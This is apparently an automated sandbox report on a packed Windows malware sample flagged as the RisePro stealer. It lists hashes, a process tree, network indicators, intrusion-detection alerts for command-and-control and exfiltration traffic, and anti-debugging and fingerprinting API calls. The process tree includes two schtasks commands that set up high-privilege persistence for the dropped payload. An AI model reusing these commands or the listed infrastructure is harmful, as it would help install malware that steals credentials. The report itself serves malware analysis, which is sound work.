Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Jan. 17, 2024, 8:05 a.m.	Jan. 17, 2024, 8:21 a.m.

Size	1.4MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`fb987f700ecaba1d1bced04a45c572e8`
SHA256	`0742fbe471be70d2879753f3e87a31201eb452cd8388d7140e3f68875491233c`
CRC32	`59B1D92A`
ssdeep	`24576:nUalkVcJGB7FyCTEaYtT9SfVK5Y3IexDzSf3Z8MQQvTICTNisPUXl7TP8o1Cl8:nyWJG7yUVYtT8RSPKqvTVTLs9TP8o1Cm`
Yara	Malicious_Library_Zero - Malicious_Library IsPE32 - (no description) Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

liva.exe "C:\Users\test22\AppData\Local\Temp\liva.exe"
840
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
  2448
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
  2560
- HMY7P2elTJeLWFuUrZFu.exe "C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\HMY7P2elTJeLWFuUrZFu.exe"
  2724
- 2hMM9txR1g67fgph3Nnz.exe "C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\2hMM9txR1g67fgph3Nnz.exe"
  2780
  - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
    2832
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2832 CREDAT:145409
      2912
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com
    2460
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef2c86e00,0x7fef2c86e10,0x7fef2c86e20
      2744
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
    2616
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
      2512
      - crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\1pfa5s83.default-release\minidumps\c497e1ef-bec2-4cab-999c-911c20288065.dmp"
        2620
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\1pfa5s83.default-release\minidumps\c497e1ef-bec2-4cab-999c-911c20288065.dmp"
        1780

Name	Response	Post-Analysis Lookup
fbcdn.net	A 157.240.215.35	157.240.215.35
facebook.com	A 157.240.215.35	157.240.215.35
www.facebook.com	A 157.240.215.35 CNAME star-mini.c10r.facebook.com	157.240.215.35
ipinfo.io	A 34.117.186.192	34.117.186.192
static.xx.fbcdn.net	A 157.240.215.14 CNAME scontent.xx.fbcdn.net	157.240.215.14
fbsbx.com	A 157.240.215.35	157.240.215.35
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.5.15
connect.facebook.net	A 157.240.215.14 CNAME scontent.xx.fbcdn.net	157.240.215.14

IP Address	Status	Action
109.107.182.3	Active	Moloch
117.18.232.200	Active	Moloch
157.240.215.14	Active	Moloch
157.240.215.35	Active	Moloch
164.124.101.2	Active	Moloch
172.67.75.166	Active	Moloch
185.215.113.68	Active	Moloch
193.233.132.62	Active	Moloch
34.117.186.192	Active	Moloch
23.67.53.17	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49166 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49168 -> 172.67.75.166:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 193.233.132.62:50500 -> 192.168.56.103:49165	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 185.215.113.68:80 -> 192.168.56.103:49179	2400020	ET DROP Spamhaus DROP Listed Traffic Inbound group 21	Misc Attack
TCP 192.168.56.103:49165 -> 193.233.132.62:50500	2049060	ET MALWARE Suspected RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 193.233.132.62:50500	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 193.233.132.62:50500	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 185.215.113.68:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 185.215.113.68:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49179	2014819	ET INFO Packed Executable Download	Misc activity
TCP 185.215.113.68:80 -> 192.168.56.103:49179	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.103:49179	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 109.107.182.3:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 109.107.182.3:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49194 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49191 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49192 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49198 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49203 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49197 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 109.107.182.3:80 -> 192.168.56.103:49180	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 109.107.182.3:80 -> 192.168.56.103:49180	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49188 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49187 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49196 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49199 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49201 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49200 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49205 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49206 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49195 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49193 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49202 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49168 172.67.75.166:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49194 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5
TLSv1 192.168.56.103:49191 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5
TLSv1 192.168.56.103:49192 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5
TLSv1 192.168.56.103:49198 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5
TLSv1 192.168.56.103:49203 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	e1:b5:47:7b:aa:89:cf:ef:84:ea:87:3a:8e:d0:cd:a8:cd:5f:55:8b
TLSv1 192.168.56.103:49197 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5
TLSv1 192.168.56.103:49188 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5
TLSv1 192.168.56.103:49187 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5
TLSv1 192.168.56.103:49196 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5
TLSv1 192.168.56.103:49199 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5
TLSv1 192.168.56.103:49201 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	e1:b5:47:7b:aa:89:cf:ef:84:ea:87:3a:8e:d0:cd:a8:cd:5f:55:8b
TLSv1 192.168.56.103:49200 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	e1:b5:47:7b:aa:89:cf:ef:84:ea:87:3a:8e:d0:cd:a8:cd:5f:55:8b
TLSv1 192.168.56.103:49205 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5
TLSv1 192.168.56.103:49206 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5
TLSv1 192.168.56.103:49195 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5
TLSv1 192.168.56.103:49193 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5
TLSv1 192.168.56.103:49202 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	e1:b5:47:7b:aa:89:cf:ef:84:ea:87:3a:8e:d0:cd:a8:cd:5f:55:8b

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameA Jan. 17, 2024, 8:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 17, 2024, 8:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 17, 2024, 8:05 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (31 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 17, 2024, 8:05 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:58 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0
IsDebuggerPresent Jan. 17, 2024, 7:59 a.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Jan. 17, 2024, 8:05 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007	1	1	0
WriteConsoleW Jan. 17, 2024, 8:05 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (4 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH
registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 17, 2024, 8:05 a.m.		1	1	0

One or more processes crashed (7 events)

Time & API	Arguments	Status
__exception__ Jan. 17, 2024, 8:05 a.m.	stacktrace: RtlpNtEnumerateSubKey+0x2a2b isupper-0x4e2b ntdll+0xcf559 @ 0x7796f559 RtlpNtEnumerateSubKey+0x2b0b isupper-0x4d4b ntdll+0xcf639 @ 0x7796f639 RtlUlonglongByteSwap+0xba5 RtlFreeOemString-0x20d35 ntdll+0x7df95 @ 0x7791df95 HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x757f14dd liva+0x1127b6 @ 0x1d27b6 liva+0x1093cc @ 0x1c93cc liva+0xfb0fc @ 0x1bb0fc liva+0x12cff2 @ 0x1ecff2 liva+0x10dd83 @ 0x1cdd83 liva+0x10e037 @ 0x1ce037 liva+0x10abf8 @ 0x1cabf8 liva+0x10ab24 @ 0x1cab24 liva+0x10ace6 @ 0x1cace6 liva+0x10ae4d @ 0x1cae4d liva+0xfb482 @ 0x1bb482 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: eb 12 8b 45 ec 8b 08 8b 09 50 51 e8 6f ff ff ff exception.symbol: RtlpNtEnumerateSubKey+0x1b25 isupper-0x5d31 ntdll+0xce653 exception.instruction: jmp 0x7796e667 exception.module: ntdll.dll exception.exception_code: 0xc0000374 exception.offset: 845395 exception.address: 0x7796e653 registers.esp: 5764672 registers.edi: 7036360 registers.eax: 5764688 registers.ebp: 5764792 registers.edx: 0 registers.ebx: 0 registers.esi: 6881280 registers.ecx: 2147483647	1
__exception__ Jan. 17, 2024, 8:05 a.m.	stacktrace: hmy7p2eltjelwfuurzfu+0x1fffd2 @ 0xf9ffd2 hmy7p2eltjelwfuurzfu+0x2034bf @ 0xfa34bf hmy7p2eltjelwfuurzfu+0x2f44e7 @ 0x10944e7 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: hmy7p2eltjelwfuurzfu+0x1535d0 exception.instruction: ud2 exception.module: HMY7P2elTJeLWFuUrZFu.exe exception.exception_code: 0xc000001d exception.offset: 1390032 exception.address: 0xef35d0 registers.esp: 3668908 registers.edi: 17387760 registers.eax: 0 registers.ebp: 3668936 registers.edx: 2 registers.ebx: 152523195 registers.esi: 14745600 registers.ecx: 41171144	1
__exception__ Jan. 17, 2024, 8:05 a.m.	stacktrace: hmy7p2eltjelwfuurzfu+0x1fffd2 @ 0xf9ffd2 hmy7p2eltjelwfuurzfu+0x2034bf @ 0xfa34bf hmy7p2eltjelwfuurzfu+0x2f44e7 @ 0x10944e7 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: hmy7p2eltjelwfuurzfu+0x1535d0 exception.instruction: ud2 exception.module: HMY7P2elTJeLWFuUrZFu.exe exception.exception_code: 0xc000001d exception.offset: 1390032 exception.address: 0xef35d0 registers.esp: 3668908 registers.edi: 3668908 registers.eax: 0 registers.ebp: 3668936 registers.edx: 2 registers.ebx: 15676902 registers.esi: 0 registers.ecx: 3668944	1
__exception__ Jan. 17, 2024, 8:07 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 101903668 registers.edi: 4802884 registers.eax: 101903668 registers.ebp: 101903748 registers.edx: 547401 registers.ebx: 101904032 registers.esi: 2147746133 registers.ecx: 88264024	1
__exception__ Jan. 17, 2024, 8:07 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x72a4540c DllCanUnloadNow+0xce86 